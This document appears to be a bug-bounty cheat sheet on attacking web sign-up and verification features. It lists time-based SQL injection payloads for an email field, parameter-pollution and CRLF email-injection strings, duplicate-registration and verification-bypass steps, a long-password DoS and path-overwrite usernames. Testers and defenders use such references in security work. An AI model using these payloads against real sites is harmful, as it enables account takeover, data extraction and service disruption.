Registration
Throw Way Email Services
Use throwaway email to create a temporary email: ○https://mail.protonmail.com ○http://en.getairmail.com ○ https://temp-mail.org/en ○https://www.mailinator.com
Check the Registration Process and try to find Idor or endpoint that leaks usernames/emails
# SQLI in Email Field
{"email":"asd'a@a.com"} --> Not Valid
{"email":"asd'or'1'='1@a.com" } --> valid
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} --> Not Valid
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} -> Valid --> Delay: 7,854 milis
{"email":"\\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\\"@a.com"} --> {"code":0,"status":200,"mes sage":"Berhasil"} --> Valid --> Delay 8,696 milis
{"email":"\\"a"-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\\"@a.com"} ---> {"code":0,"status":200,"mes sage":"Berhasil"} ---> Valid --> No delay
# Resources
- <https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>
Email Verification Feature
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
#No domain:
email=victim
#No TLD (Top Level Domain):
email=victim@xyz
#change param case
email=victim@mail.com&Email=attacker@mail.com
email@email.com,victim@hack.secry
email@email“,”victim@hack.secry
email@email.com:victim@hack.secry
email@email.com%0d%0avictim@hack.secry
%0d%0avictim@hack.secry
%0avictim@hack.secry
victim@hack.secry%0d%0a
victim@hack.secry%0a
victim@hack.secry%0d
victim@hack.secr%00
victim@hack.secry{{}}
OTP Bypass
# Duplicate registration / Overwrite existing user
1. Create first account in application with email say abc@gmail.com and password.
2. Logout of the account and create another account with same email and different password.
3. You can even try to change email case in some case like
from abc@gmail.com to Abc@gmail.com
Try to generate using an existing username
Check varying the email: uppercase, +1@, Put black characters after the email: test@test.com a , special characters in the email
name (%00, %09, %20), victim@gmail.com@attacker.com, victim@attacker.com@gmail.com
4. Finish the creation process — and see that it succeeds
5. Now go back and try to login with email and the new password. You are successfully logged in.
Further Read
<https://hackerone.com/reports/187714>
<https://shahjerry33.medium.com/duplicate-registration-the-twinning-twins-883dfee59eaf>
<https://blog.securitybreached.org/2020/01/22/user-account-takeover-via-signup-feature-bug-bounty-poc/>
---------------------------------------------------------------------------------------------------
# Exploit
# Delete any user account without user interaction The database accepts string as it without convert it to lowercase string
1. Create a normal email ex. theuntest@crowd.com
2. After the email created I able to bypass verify too
3. Bypass for the verify easy, send a valid token to any email the link will be like: <https://the-vulnreable/confi-endpoint/account/confirmemail?userId=maybeeee@gmail.com&token=ananfnasjfasjnfjasfsaa>
4. Just manipulate the email with your email and the email will verified
5. Now login to the normal account as shown I received the JWT normally
6. After create an account customize the email, so the email will be like: MAybeeEE@GmaiL.coM, looks like camel case
7. As shown below I able to register the customized email as an another email
8. After the email created I have the ability to bypass the verify as shown above
9. URL will be like: <https://the-vulnreable/confi-endpoint/account/confirmemail?userId=MAybeeEE@GmaiL.coM&token=ananfnasjfasjnfjasfsaa>
10. The user will verified
11. Here the two users has signed
12. The user will received authentication successful but will never receives JWT because the customized email will conflicts with the old email in DB
- <https://m.facebook.com/story.php?story_fbid=pfbid0345dp8U87sY32EfSKAnkqsUNJrN9iMt5WLYFZZQHnimriAbgHv2bBQSEPHPV66Sppl&id=100010641453891&mibextid=Nif5oz>
DOS at Name/Password field in Signup Page.
Steps to reproduce:
1. Go Sign up form.
2. Fill the form and enter a long string in password
3. Click on enter and you’ll get 500 Internal Server error if it is vulnerable.
Further Read
<https://shahjerry33.medium.com/long-string-dos-6ba8ceab3aa0>
<https://hackerone.com/reports/738569>
<https://hackerone.com/reports/223854>
# Path Overwrite
If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php or../../../../index.php , now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered.
Further Read: <https://infosecwriteups.com/logical-flaw-resulting-path-hijacking-dd4d1e1e832f>
# Weak Password Policy
check if program accept
1. weak passwords like 123456
2. username same as email address
3. password same as email address
4. improper implemented password reset and change features
Last updated